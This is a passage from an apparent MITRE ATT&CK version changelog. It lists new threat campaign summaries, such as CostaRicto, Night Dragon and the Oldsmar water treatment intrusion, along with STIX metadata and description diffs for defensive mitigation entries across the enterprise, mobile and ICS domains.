Description: [C0015](https://attack.mitre.org/campaigns/C0015) was a ransomware intrusion during which the unidentified attackers used [Bazar](https://attack.mitre.org/software/S0534), [Cobalt Strike](https://attack.mitre.org/software/S0154), and [Conti](https://attack.mitre.org/software/S0575), along with other tools, over a 5 day period. Security researchers assessed the actors likely used the widely-circulated [Conti](https://attack.mitre.org/software/S0575) ransomware playbook based on the observed pattern of activity and operator errors.(Citation: DFIR Conti Bazar Nov 2021)


[C0004] CostaRicto

Current version: 1.0

Description: [CostaRicto](https://attack.mitre.org/campaigns/C0004) was a suspected hacker-for-hire cyber espionage campaign that targeted multiple industries worldwide, with a large number being financial institutions. [CostaRicto](https://attack.mitre.org/campaigns/C0004) actors targeted organizations in Europe, the Americas, Asia, Australia, and Africa, with a large concentration in South Asia (especially India, Bangladesh, and Singapore), using custom malware, open source tools, and a complex network of proxies and SSH tunnels.(Citation: BlackBerry CostaRicto November 2020)


[C0001] Frankenstein

Current version: 1.0

Description: [Frankenstein](https://attack.mitre.org/campaigns/C0001) was described by security researchers as a highly-targeted campaign conducted by moderately sophisticated and highly resourceful threat actors in early 2019. The unidentified actors primarily relied on open source tools, including [Empire](https://attack.mitre.org/software/S0363). The campaign name refers to the actors' ability to piece together several unrelated open-source tool components.(Citation: Talos Frankenstein June 2019)


[C0007] FunnyDream

Current version: 1.0

Description: [FunnyDream](https://attack.mitre.org/campaigns/C0007) was a suspected Chinese cyber espionage campaign that targeted government and foreign organizations in Malaysia, the Philippines, Taiwan, Vietnam, and other parts of Southeast Asia. Security researchers linked the [FunnyDream](https://attack.mitre.org/campaigns/C0007) campaign to possible Chinese-speaking threat actors through the use of the [Chinoxy](https://attack.mitre.org/software/S1041) backdoor and noted infrastructure overlap with the TAG-16 threat group.(Citation: Bitdefender FunnyDream Campaign November 2020)(Citation: Kaspersky APT Trends Q1 2020)(Citation: Recorded Future Chinese Activity in Southeast Asia December 2021)


[C0002] Night Dragon

Current version: 1.0

Description: [Night Dragon](https://attack.mitre.org/campaigns/C0002) was a cyber espionage campaign that targeted oil, energy, and petrochemical companies, along with individuals and executives in Kazakhstan, Taiwan, Greece, and the United States. The unidentified threat actors searched for information related to oil and gas field production systems, financials, and collected data from SCADA systems. Based on the observed techniques, tools, and network activities, security researchers assessed the campaign involved a threat group based in China.(Citation: McAfee Night Dragon)


[C0012] Operation CuckooBees

Current version: 1.0

Description: [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012) was a cyber espionage campaign targeting technology and manufacturing companies in East Asia, Western Europe, and North America since at least 2019. Security researchers noted the goal of [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), which was still ongoing as of May 2022, was likely the theft of proprietary information, research and development documents, source code, and blueprints for various technologies. Researchers assessed [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012) was conducted by actors affiliated with [Winnti Group](https://attack.mitre.org/groups/G0044), [APT41](https://attack.mitre.org/groups/G0096), and BARIUM.(Citation: Cybereason OperationCuckooBees May 2022)


[C0016] Operation Dust Storm

Current version: 1.0

Description: [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) was a long-standing persistent cyber espionage campaign that targeted multiple industries in Japan, South Korea, the United States, Europe, and several Southeast Asian countries. By 2015, the [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) threat actors shifted from government and defense-related intelligence targets to Japanese companies or Japanese subdivisions of larger foreign organizations supporting Japan's critical infrastructure, including electricity generation, oil and natural gas, finance, transportation, and construction.(Citation: Cylance Dust Storm) [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) threat actors also began to use Android backdoors in their operations by 2015, with all identified victims at the time residing in Japan or South Korea.(Citation: Cylance Dust Storm)


[C0006] Operation Honeybee

Current version: 1.0

Description: [Operation Honeybee](https://attack.mitre.org/campaigns/C0006) was a campaign that targeted humanitarian aid and inter-Korean affairs organizations from at least late 2017 through early 2018. [Operation Honeybee](https://attack.mitre.org/campaigns/C0006) initially targeted South Korea, but expanded to include Vietnam, Singapore, Japan, Indonesia, Argentina, and Canada. Security researchers assessed the threat actors were likely Korean speakers based on metadata used in both lure documents and executables, and named the campaign "Honeybee" after the author name discovered in malicious Word documents.(Citation: McAfee Honeybee)


[C0013] Operation Sharpshooter

Current version: 1.0

Description: [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013) was a global cyber espionage campaign that targeted nuclear, defense, government, energy, and financial companies, with many located in Germany, Turkey, the United Kingdom, and the United States. Security researchers noted the campaign shared many similarities with previous [Lazarus Group](https://attack.mitre.org/groups/G0032) operations, including fake job recruitment lures and shared malware code.(Citation: McAfee Sharpshooter December 2018)(Citation: Bleeping Computer Op Sharpshooter March 2019)(Citation: Threatpost New Op Sharpshooter Data March 2019)


[C0005] Operation Spalax

Current version: 1.0

Description: [Operation Spalax](https://attack.mitre.org/campaigns/C0005) was a campaign that primarily targeted Colombian government organizations and private companies, particularly those associated with the energy and metallurgical industries. The [Operation Spalax](https://attack.mitre.org/campaigns/C0005) threat actors distributed commodity malware and tools using generic phishing topics related to COVID-19, banking, and law enforcement action. Security researchers noted indicators of compromise and some infrastructure overlaps with other campaigns dating back to April 2018, including at least one separately attributed to [APT-C-36](https://attack.mitre.org/groups/G0099), however identified enough differences to report this as separate, unattributed activity.(Citation: ESET Operation Spalax Jan 2021)


[C0014] Operation Wocao

Current version: 1.0

Description: [Operation Wocao](https://attack.mitre.org/campaigns/C0014) was a cyber espionage campaign that targeted organizations around the world, including in Brazil, China, France, Germany, Italy, Mexico, Portugal, Spain, the United Kingdom, and the United States. The suspected China-based actors compromised government organizations and managed service providers, as well as aviation, construction, energy, finance, health care, insurance, offshore engineering, software development, and transportation companies.(Citation: FoxIT Wocao December 2019) Security researchers assessed the [Operation Wocao](https://attack.mitre.org/campaigns/C0014) actors used similar TTPs and tools as APT20, suggesting a possible overlap. [Operation Wocao](https://attack.mitre.org/campaigns/C0014) was named after an observed command line entry by one of the threat actors, possibly out of frustration from losing webshell access.(Citation: FoxIT Wocao December 2019)

mobile-attack

New Campaigns

[C0016] Operation Dust Storm

Current version: 1.0

Description: [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) was a long-standing persistent cyber espionage campaign that targeted multiple industries in Japan, South Korea, the United States, Europe, and several Southeast Asian countries. By 2015, the [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) threat actors shifted from government and defense-related intelligence targets to Japanese companies or Japanese subdivisions of larger foreign organizations supporting Japan's critical infrastructure, including electricity generation, oil and natural gas, finance, transportation, and construction.(Citation: Cylance Dust Storm) [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016) threat actors also began to use Android backdoors in their operations by 2015, with all identified victims at the time residing in Japan or South Korea.(Citation: Cylance Dust Storm)

ics-attack

New Campaigns

[C0009] Oldsmar Treatment Plant Intrusion

Current version: 1.0

Description: [Oldsmar Treatment Plant Intrusion](https://attack.mitre.org/campaigns/C0009) was a cyber incident involving a water treatment facility in Florida. During this incident, unidentified threat actors leveraged features of the system to access and modify setpoints for a specific chemical required in the treatment process. The incident was detected immediately and prevented before it could cause any harm to the public.(Citation: Pinellas County Sheriffs Office February 2021)(Citation: CISA AA21-042A Water Treatment Intrusion Feb 2021)(Citation: Dragos Oldsmar Feb 2021)

Mitigations

enterprise-attack

Minor Version Changes

[M1038] Execution Prevention

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-06-20 20:11:42.195000+00:002022-02-28 19:50:41.210000+00:00
x_mitre_version1.11.2
Metadata-only Changes

[M1036] Account Use Policies

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2019-06-13 16:07:21.233000+00:002022-10-21 15:52:18.525000+00:00

[M1047] Audit

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-11-19 20:44:07.442000+00:002022-10-21 15:52:12.722000+00:00

[M1043] Credential Access Protection

Current version: 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-31 13:09:22.442000+00:002022-10-21 15:51:57.176000+00:00

[M1032] Multi-factor Authentication

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2019-06-10 20:53:36.319000+00:002022-10-21 15:52:06.295000+00:00

[M1027] Password Policies

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2019-06-06 21:10:35.792000+00:002022-10-21 15:52:23.327000+00:00

mobile-attack

Deprecations

[M1005] Application Vetting

Current version: 1.0

Description: Enterprises can vet applications for exploitable vulnerabilities or unwanted (privacy-invasive or malicious) behaviors. Enterprises can inspect applications themselves or use a third-party service. Enterprises may impose policies to only allow pre-approved applications to be installed on their devices or may impose policies to block use of specific applications known to have issues. In Bring Your Own Device (BYOD) environments, enterprises may only be able to impose these policies over an enterprise-managed portion of the device. Application Vetting is not a complete mitigation. Techniques such as [Evade Analysis Environment](https://attack.mitre.org/techniques/T1523) exist that can enable adversaries to bypass vetting.

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedTrue
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-02-18 16:14:17.809000+00:002022-04-06 14:47:46.019000+00:00

[M1007] Caution with Device Administrator Access

Current version: 1.0

Description: Warn device users not to accept requests to grant Device Administrator access to applications without good reason. Additionally, application vetting should include a check on whether the application requests Device Administrator access. Applications that do request Device Administrator access should be carefully scrutinized and only allowed to be used if a valid reason exists.

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedTrue
x_mitre_domains['mobile-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_old_attack_idMOB-M1007
values_changed
STIX FieldOld valueNew Value
modified2018-10-17 00:14:20.652000+00:002022-04-06 14:47:19.714000+00:00

ics-attack

Other Version Changes

[M0937] Filter Network Traffic

Current version: 1.0

Version changed from: 1.1 → 1.0


Old Description
New Description
t1Use network appliances to filter ingress or egress traffic at1Use network appliances to filter ingress or egress traffic a
>nd perform protocol-based filtering. Configure software on e>nd perform protocol-based filtering. Configure software on e
>ndpoints to filter network traffic. Perform inline allow/den>ndpoints to filter network traffic.   Perform inline allow/d
>ylisting of network messages based on the application layer >enylisting of network messages based on the application laye
>(OSI Layer 7) protocol, especially for automation protocols.>r (OSI Layer 7) protocol, especially for automation protocol
> Application allowlists are beneficial when there are well-d>s. Application allowlists are beneficial when there are well
>efined communication sequences, types, rates, or patterns ne>-defined communication sequences, types, rates, or patterns 
>eded during expected system operations. Application denylist>needed during expected system operations. Application denyli
>s may be needed if all acceptable communication sequences ca>sts may be needed if all acceptable communication sequences 
>nnot be defined, but instead a set of known malicious uses c>cannot be defined, but instead a set of known malicious uses
>an be denied (e.g., excessive communication attempts, shutdo> can be denied (e.g., excessive communication  attempts, shu
>wn messages, invalid commands). Devices performing these fun>tdown messages, invalid commands).  Devices performing these
>ctions are often referred to as deep-packet inspection (DPI)> functions are often referred to as deep-packet inspection (
> firewalls, context-aware firewalls, or firewalls blocking s>DPI) firewalls, context-aware firewalls, or firewalls blocki
>pecific automation/SCADA protocol aware firewalls.>ng specific automation/SCADA protocol aware firewalls. (Cita
 >tion: Centre for the Protection of National Infrastructure F
 >ebruary 2005)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - AC-3; SC-7', 'IEC 62443-3-3:2013 - SR 5.1', 'IEC 62443-4-2:2019 - CR 5.1']
values_changed
STIX FieldOld valueNew Value
modified2021-04-10 14:15:36.342000+00:002022-10-24 15:09:07.609000+00:00
descriptionUse network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic. Perform inline allow/denylisting of network messages based on the application layer (OSI Layer 7) protocol, especially for automation protocols. Application allowlists are beneficial when there are well-defined communication sequences, types, rates, or patterns needed during expected system operations. Application denylists may be needed if all acceptable communication sequences cannot be defined, but instead a set of known malicious uses can be denied (e.g., excessive communication attempts, shutdown messages, invalid commands). Devices performing these functions are often referred to as deep-packet inspection (DPI) firewalls, context-aware firewalls, or firewalls blocking specific automation/SCADA protocol aware firewalls.Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic. Perform inline allow/denylisting of network messages based on the application layer (OSI Layer 7) protocol, especially for automation protocols. Application allowlists are beneficial when there are well-defined communication sequences, types, rates, or patterns needed during expected system operations. Application denylists may be needed if all acceptable communication sequences cannot be defined, but instead a set of known malicious uses can be denied (e.g., excessive communication attempts, shutdown messages, invalid commands). Devices performing these functions are often referred to as deep-packet inspection (DPI) firewalls, context-aware firewalls, or firewalls blocking specific automation/SCADA protocol aware firewalls. (Citation: Centre for the Protection of National Infrastructure February 2005)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0937https://attack.mitre.org/mitigations/M0937
x_mitre_version1.11.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Centre for the Protection of National Infrastructure February 2005', 'description': 'Centre for the Protection of National Infrastructure 2005, February FIREWALL DEPLOYMENT FOR SCADA AND PROCESS CONTROL NETWORKS Retrieved. 2020/09/17 ', 'url': 'https://www.energy.gov/sites/prod/files/Good%20Practices%20Guide%20for%20Firewall%20Deployment.pdf'}
Metadata-only Changes

[M0801] Access Management

Current version: 1.0


Old Description
New Description
t1Access Management technologies can be used to enforce authort1Access Management technologies can be used to enforce author
>ization polices and decisions, especially when existing fiel>ization polices and decisions, especially when existing fiel
>d devices do not provided capabilities to support user ident>d devices do not provided sufficient capabilities to support
>ification and authentication. (Citation: NIST SP 1800-2) The> user identification and authentication. (Citation: McCarthy
>se technologies typically utilize an in-line network device >, J et al. July 2018) These technologies typically utilize a
>or gateway system to prevent access to unauthenticated users>n in-line network device or gateway system to prevent access
>, while also integrating with an authentication service to f> to unauthenticated users, while also integrating with an au
>irst verify user credentials. (Citation: CPNI Nov 2010)>thentication service to first verify user credentials. (Cita
 >tion: Centre for the Protection of National Infrastructure N
 >ovember 2010)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - AC-3', 'IEC 62443-3-3:2013 - SR 2.1', 'IEC 62443-4-2:2019 - CR 2.1']
values_changed
STIX FieldOld valueNew Value
modified2020-09-25 13:05:21.233000+00:002022-10-24 15:09:07.609000+00:00
descriptionAccess Management technologies can be used to enforce authorization polices and decisions, especially when existing field devices do not provided capabilities to support user identification and authentication. (Citation: NIST SP 1800-2) These technologies typically utilize an in-line network device or gateway system to prevent access to unauthenticated users, while also integrating with an authentication service to first verify user credentials. (Citation: CPNI Nov 2010)Access Management technologies can be used to enforce authorization polices and decisions, especially when existing field devices do not provided sufficient capabilities to support user identification and authentication. (Citation: McCarthy, J et al. July 2018) These technologies typically utilize an in-line network device or gateway system to prevent access to unauthenticated users, while also integrating with an authentication service to first verify user credentials. (Citation: Centre for the Protection of National Infrastructure November 2010)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0801https://attack.mitre.org/mitigations/M0801
external_references[1]['source_name']NIST SP 1800-2McCarthy, J et al. July 2018
external_references[1]['description']McCarthy, J et al.. (2018, July). NIST SP 1800-2 Identity and Access Management for Electric Utilities. Retrieved September 17, 2020.McCarthy, J et al. 2018, July NIST SP 1800-2 Identity and Access Management for Electric Utilities Retrieved. 2020/09/17
external_references[2]['source_name']CPNI Nov 2010Centre for the Protection of National Infrastructure November 2010
external_references[2]['description']Centre for the Protection of National Infrastructure. (2010, November). Configuring and Managing Remote Access for Industrial Control Systems. Retrieved September 25, 2020.Centre for the Protection of National Infrastructure 2010, November Configuring and Managing Remote Access for Industrial Control Systems Retrieved. 2020/09/25

[M0936] Account Use Policies

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - IA-5', 'IEC 62443-3-3:2013 - SR 1.11', 'IEC 62443-4-2:2019 - CR 1.11']
values_changed
STIX FieldOld valueNew Value
modified2021-04-10 14:15:21.233000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0936https://attack.mitre.org/mitigations/M0936

[M0915] Active Directory Configuration

Current version: 1.0


Old Description
New Description
t1Configure Active Directory to prevent use of certain techniqt1Configure Active Directory to prevent use of certain techniq
>ues; use SID Filtering, etc.>ues; use security identifier (SID) Filtering, etc.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-05-29 16:34:40.344000+00:002022-10-24 15:09:07.609000+00:00
descriptionConfigure Active Directory to prevent use of certain techniques; use SID Filtering, etc.Configure Active Directory to prevent use of certain techniques; use security identifier (SID) Filtering, etc.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0915https://attack.mitre.org/mitigations/M0915

[M0949] Antivirus/Antimalware

Current version: 1.0


Old Description
New Description
t1Use signatures or heuristics to detect malicious software. Wt1Use signatures or heuristics to detect malicious software.  
>ithin industrial control environments, antivirus/antimalware>Within industrial control environments, antivirus/antimalwar
> installations should be limited to assets that are not invo>e installations should be limited to assets that are not inv
>lved in critical or real-time operations. To minimize the im>olved in critical or real-time operations. To minimize the i
>pact to system availability, all products should first be va>mpact to system availability, all products should first be v
>lidated within a representative test environment before depl>alidated within a representative test environment before dep
>oyment to production systems.(Citation: CISA Antivirus ICS A>loyment to production systems. (Citation: NCCIAugust 2018)
>ugust 2018) 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - SI-3', 'IEC 62443-3-3:2013 SR 3.2', 'IEC 62443-4-2:2019 - CR 3.2']
values_changed
STIX FieldOld valueNew Value
modified2020-03-31 13:07:15.684000+00:002022-10-24 15:09:07.609000+00:00
descriptionUse signatures or heuristics to detect malicious software. Within industrial control environments, antivirus/antimalware installations should be limited to assets that are not involved in critical or real-time operations. To minimize the impact to system availability, all products should first be validated within a representative test environment before deployment to production systems.(Citation: CISA Antivirus ICS August 2018)Use signatures or heuristics to detect malicious software. Within industrial control environments, antivirus/antimalware installations should be limited to assets that are not involved in critical or real-time operations. To minimize the impact to system availability, all products should first be validated within a representative test environment before deployment to production systems. (Citation: NCCIC August 2018)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0949https://attack.mitre.org/mitigations/M0949
external_references[1]['source_name']CISA Antivirus ICS August 2018NCCIC August 2018
external_references[1]['description']NCCIC. (2018, August 2). Recommended Practice: Updating Antivirus in an Industrial Control System. Retrieved September 17, 2020.NCCIC 2018, August 2 Recommended Practice: Updating Antivirus in an Industrial Control System Retrieved. 2020/09/17

[M0913] Application Developer Guidance

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - AT-3']
values_changed
STIX FieldOld valueNew Value
modified2021-04-10 13:48:20.652000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0913https://attack.mitre.org/mitigations/M0913

[M0948] Application Isolation and Sandboxing

Current version: 1.0


Old Description
New Description
t1Restrict execution of code to a virtual environment on or int1Restrict the execution of code to a virtual environment on o
> transit to an endpoint system.>r in-transit to an endpoint system.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - SI-3', 'IEC 62443-3-3:2013 - SR 5.4', 'IEC 62443-4-2:2019 - CR 5.4']
values_changed
STIX FieldOld valueNew Value
modified2021-04-10 14:17:03.851000+00:002022-10-24 15:09:07.609000+00:00
descriptionRestrict execution of code to a virtual environment on or in transit to an endpoint system.Restrict the execution of code to a virtual environment on or in-transit to an endpoint system.
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0948https://attack.mitre.org/mitigations/M0948

[M0947] Audit

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - SI-7', 'IEC 62443-4-2:2013 - SR 3.4', 'IEC 62443-4-2:2019 - CR 3.4']
values_changed
STIX FieldOld valueNew Value
modified2021-04-10 14:17:45.966000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0947https://attack.mitre.org/mitigations/M0947

[M0800] Authorization Enforcement

Current version: 1.0


Old Description
New Description
t1The device or system should restrict access to read, manipult1The device or system should restrict read, manipulate, or ex
>ate, or execute system objects to only authenticated users w>ecute privileges to only authenticated users who require acc
>ho require access based on approved security policies. Role->ess based on approved security policies.  Role-based Access 
>based Access Control (RBAC) schemes can help reduce the over>Control (RBAC) schemes can help reduce the overhead of assig
>head of assigning permissions to the large number of devices>ning permissions to the large number of devices within an IC
> within an ICS. For example, IEC 62351 provides examples of >S. For example, IEC 62351 provides examples of roles used to
>roles used to support common system operations within the el> support common system operations within the electric power 
>ectric power sector (Citation: IEC 62351), while IEEE 1686 p>sector  (Citation: International Electrotechnical Commission
>rovide sets of standard permissions for users of IEDs. (Cita> July 2020), while IEEE 1686 defines standard permissions fo
>tion: IEEE 1686-2013)>r users of IEDs. (Citation: Institute of Electrical and Elec
 >tronics Engineers January 2014)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - AC-3', 'IEC 62443-4-2:2013 - SR 2.1', 'IEC 62443-4-2:2019 - CR 2.1']
values_changed
STIX FieldOld valueNew Value
modified2020-09-17 13:55:21.233000+00:002022-10-24 15:09:07.609000+00:00
descriptionThe device or system should restrict access to read, manipulate, or execute system objects to only authenticated users who require access based on approved security policies. Role-based Access Control (RBAC) schemes can help reduce the overhead of assigning permissions to the large number of devices within an ICS. For example, IEC 62351 provides examples of roles used to support common system operations within the electric power sector (Citation: IEC 62351), while IEEE 1686 provide sets of standard permissions for users of IEDs. (Citation: IEEE 1686-2013)The device or system should restrict read, manipulate, or execute privileges to only authenticated users who require access based on approved security policies. Role-based Access Control (RBAC) schemes can help reduce the overhead of assigning permissions to the large number of devices within an ICS. For example, IEC 62351 provides examples of roles used to support common system operations within the electric power sector (Citation: International Electrotechnical Commission July 2020), while IEEE 1686 defines standard permissions for users of IEDs. (Citation: Institute of Electrical and Electronics Engineers January 2014)
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0800https://attack.mitre.org/mitigations/M0800
external_references[1]['source_name']IEC 62351International Electrotechnical Commission July 2020
external_references[1]['description']International Electrotechnical Commission. (2020, July 17). IEC 62351 - Power systems management and associated information exchange - Data and communications security. Retrieved September 17, 2020.International Electrotechnical Commission 2020, July 17 IEC 62351 - Power systems management and associated information exchange - Data and communications security Retrieved. 2020/09/17
external_references[2]['source_name']IEEE 1686-2013Institute of Electrical and Electronics Engineers January 2014
external_references[2]['description']Institute of Electrical and Electronics Engineers. (2014, January). 1686-2013 - IEEE Standard for Intelligent Electronic Devices Cyber Security Capabilities. Retrieved September 17, 2020.Institute of Electrical and Electronics Engineers 2014, January 1686-2013 - IEEE Standard for Intelligent Electronic Devices Cyber Security Capabilities Retrieved. 2020/09/17

[M0946] Boot Integrity

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - SI-7', 'IEC 62443-4-2:2019 - CR 3.14']
values_changed
STIX FieldOld valueNew Value
modified2021-04-10 14:17:50.603000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0946https://attack.mitre.org/mitigations/M0946

[M0945] Code Signing

Current version: 1.0

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - SI-7', 'IEC 62443-3-3:2013 - SR 3.4', 'IEC 62443-4-2:2019 - CR 3.4']
values_changed
STIX FieldOld valueNew Value
modified2021-04-10 14:16:02.881000+00:002022-10-24 15:09:07.609000+00:00
external_references[0]['source_name']mitre-ics-attackmitre-attack
external_references[0]['url']https://collaborate.mitre.org/attackics/index.php/Mitigation/M0945https://attack.mitre.org/mitigations/M0945

[M0802] Communication Authenticity

Current version: 1.0


Old Description
New Description
t1When communicating over an untrusted network utilize secure t1When communicating over an untrusted network, utilize secure
>network protocols that both authenticate the message sender > network protocols that both authenticate the message sender
>and can verify its integrity, either through message authent> and can verify its integrity. This can be done either throu
>ication codes (MACs) or digital signatures, to prevent the t>gh message authentication codes (MACs) or digital signatures
>ransmission of spoofed network messages or unauthorized conn>, to detect spoofed network messages and unauthorized connec
>ections.>tions.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_domains['ics-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
labels['NIST SP 800-53 Rev. 4 - SC-8;SC-23', 'IEC 62443-3-3:2013 - SR 3.1', 'IEC 62443-4-2:2019 - CR 3.1']
values_changed
STIX FieldOld valueNew Value
modified2020-09-17 13:55:21.233000+00:002022-10-24 15:09:07.609000+00:00
descriptionWhen communicating over an untrusted network utilize secure network protocols that both authenticate the message sender and can verify its integrity, either through message authentication codes (MACs) or digital signatures, to prevent the transmission of spoofed network messages or unauthorized connections.When communicating over an untrusted network, utilize secure network protocols that both authenticate the message sender and can verify its integrity. This can be done either through message authentication codes (MACs) or digital signatures, to detect spoofed network messages and unauthorized connections.
external_references[0]['source_name']mitre-ics-attackmitre-attack
